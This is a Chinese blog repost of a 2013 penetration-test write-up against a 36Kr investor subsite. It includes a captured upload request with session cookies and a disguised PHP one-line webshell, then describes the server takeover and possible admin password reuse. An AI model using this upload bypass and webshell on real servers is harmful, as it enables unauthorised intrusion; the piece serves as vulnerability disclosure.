当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

对36氪的一次渗透测试

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

36氪的主页(),WordPress程序,没搞头呀,于是试试渗透吧。

于是看到投资人服务那里有个分站链接: 注册个创业者身份看看有些什么内容吧。
创业者可以上传头像,创建产品什么的。
 
习惯性动作,上传头像抓包改包上传。但经过数次测试,发现上传非图片文件,
名称后辍自动加上“_”,即上传.php 去变成了._php 这样的文件不被解释呀。。。

但这个过程中也会暴出图片处理的错误信息如下:
#0 [2 : getimagesize(/var/www/36tree_v2.0/mars/host/http://vc.36tr.com:80/avatar_image/20120507/11/34/90/n1336371610158.gif): failed to open stream: No such file or directory] tracking call at ()
#1 getimagesize call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (212)
#2 getWidth call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (246)
#3 executeAvatar call at /var/www/36tree_v2.0/corelib/uploadAvatar.class.php (62)
#4 tempSaveUploadPicture call at /var/www/36tree_v2.0/mars/app/vccontroller/signup.class.php (170)
#5 do_ajax_getHtmlSetAvatar call at /var/www/36tree_v2.0/corelib/CAction.class.php (127)
#6 do_method call at /var/www/36tree_v2.0/mars/vchost/index.php (68)
 
这暴路径没什么意义呢,继续看创建产品的。
 
 



一眼看到还有上传的地方,心里暗喜。^-^
于是随便填了些信息上传抓包,并把文件名改成了php后辍,重新提交。
 
POST /product/ajax_importBussinessFile HTTP/1.1
Host: vc.36tr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive 
Referer:
Cookie: PHPSESSID=uc7qlr9k1toucpjl3ocldsida3; __utma=115084165.360224318.1336370862.1336370862.1336371307.2; __utmb=115084165.43.10.1336371307; __utmc=115084165; __utmz=115084165.1336371307.2.2.utmcsr=bing|utmccn=(organic)|utmcmd=organic|utmctr=ip%3A220.181.49.209; vc_session_dd=4bc060e1ccfa40c8; vc_user_cookie=56a4496decebcd8961228599a63b0708
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 391
 
-----------------------------24464570528145
Content-Disposition: form-data; name="product_id"
 
1429
-----------------------------24464570528145
Content-Disposition: form-data; name="bussiness_file[]"; filename="aa.php"
Content-Type: application/vnd.ms-powerpoint
 
GIF89a.............!.......,............
<?php eval($_POST[guji]); ?>
-----------------------------24464570528145—
 
 
 



 
 
 
上传成功了,没错。没有检测文件后辍。正高兴着,访问之,即时杯具了。。
 
 



 
文件直接下载了????
当时在想,这是php设置了解释问题?文件是存在数据库中?文件是通过读取输出来的?
心想,无论上述是那一种,都没什么办法。唉,放弃吧!!!
但又手戝了一下,输入:
 
 


 
 
 
操,www.xuhantao.com,有机,看来今天RP暴发,涛涛电脑知识网,服务器不但列目录,而且文件放在上面了。呵呵。。。后面的不用说了,用一句话客户端连上去,服务器权限大着呢。很多网站都在这里,还有些重要的信息。主站好像不在这服务器上,我就不继续了。木马文件我也删除了。
 
但是经过对信息挖掘和分析,发现利用“社会工程”,各个地方的管理使用同一个账号密码可能导致其他网站甚至包括主站也是可以进入的

 
修复方案:

注意分站安全。其它应该懂得。

作者:Jannock

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1